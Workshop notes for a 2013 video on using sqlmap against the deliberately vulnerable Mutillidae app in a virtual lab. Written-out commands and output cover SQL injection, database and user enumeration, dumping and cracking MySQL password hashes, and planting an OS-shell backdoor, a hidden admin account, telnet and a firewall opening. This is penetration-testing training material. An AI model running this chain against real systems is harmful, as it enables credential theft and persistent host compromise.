Last updated at Mon, 24 Jul 2017 19:56:00 GMT
Author: Jeremy Druin
Twitter: @webpwnized
YouTube Channel: http://www.youtube.com/user/webpwnized
Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/)
Recorded at the ISSA Kentuckiana February 2013 Workshop, this video review the use of sqlmap; an automated sql injection audit tool.
The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is large amounts of documentation on this feature already.
Environment
The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not neccesary to recreate the lab exercise. All of the items can be reproduced on "localhost".
The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out.
Notes from Presentation
Please find notes from the talk below which can be used to follow along with the video.
--------------------------------------------------
Running SQLMAP Help
--------------------------------------------------
--help Help
-hh Double the help
--------------------------------------------------
Running SQLMAP "Manually"
--------------------------------------------------
./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner
--------------------------------------------------
Capturing Request To Pass To SQLMAP
--------------------------------------------------
URL: http://192.168.56.102/mutillidae/index.php?page=login.php
Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
username=asdf&password=asdf&login-php-submit-button=Login
--------------------------------------------------
Running SQLMAP with "auto-parse"
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>
--------------------------------------------------
Running SQLMAP with various features
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>
--banner
web server operating system: Windows
web application technology: PHP 5.4.4, Apache 2.4.2
back-end DBMS: MySQL 5.0
banner: '5.5.25a'
--fingerprint
web server operating system: Windows
web application technology: PHP 5.4.4, Apache 2.4.2
back-end DBMS: active fingerprint: MySQL >= 5.5.0
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
current user: 'root@localhost'
current database: 'nowasp'
current user is DBA: True
hostname: 'mutillid-7se1xr'
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
database management system users
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
--dbs Enumerate DBMS databases
available databases[10]:
[*] cdcol
[*] information_schema
[*] mysql
[*] nowasp
[*] owasp10
[*] owasp13
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
-------------------------------------------------------------------------------- --------------------
Enumerate DBMS database tables, columns, structure (schema)
-------------------------------------------------------------------------------- --------------------
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--------------------------------------------------
Extracting data
--------------------------------------------------
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
--------------------------------------------------
Listing columns from tables
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"
select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv
[*] Alter_routine_priv
[*] authentication_string
[*] Create_priv
[*] Create_routine_priv
[*] Create_tablespace_priv
[*] Create_tmp_table_priv
[*] Create_user_priv
[*] Create_view_priv
[*] Delete_priv
[*] Drop_priv
[*] Event_priv
[*] Execute_priv
[*] File_priv
[*] Grant_priv
[*] Host
[*] Index_priv
[*] Insert_priv
[*] Lock_tables_priv
[*] max_connections
[*] max_questions
[*] max_updates
[*] max_user_connections
[*] Password
[*] plugin
[*] Process_priv
[*] References_priv
[*] Reload_priv
[*] Repl_client_priv
[*] Repl_slave_priv
[*] Select_priv
[*] Show_db_priv
[*] Show_view_priv
[*] Shutdown_priv
[*] ssl_cipher
[*] ssl_type
[*] Super_priv
[*] Trigger_priv
[*] Update_priv
[*] User
[*] x509_issuer
[*] x509_subject
--------------------------------------------------
Advanced: Modifying injections
--------------------------------------------------
SELECT * FROM accounts WHERE username='' AND password='''
./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--------------------------------------------------
Advanced: Dealing with inconsistent results
--------------------------------------------------
select User, Password from mysql.user
versus
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"
select User, Password from mysql.user order by User desc
select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,
--------------------------------------------------
Cracking MySQL Password Hashes
--------------------------------------------------
John the Ripper Command Line
/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes
Password Hashes in MySQL Format
Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B
--------------------------------------------------
Understanding sqlmap O/S Shell
--------------------------------------------------
View transaction: tcpdump -i eth1 -vvv -X
1st Stage Uploader
2nd Stage Command Shell Page
sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101
--------------------------------------------------
Interacting Directly with sqlmap O/S Shell Backdoor
--------------------------------------------------
http://192.168.56.102/<temp file name>?cmd=ping 192.168.56.101
--------------------------------------------------
Direct connection to the database
--------------------------------------------------
Installing Py-MySQL Dependency
git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL
./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10
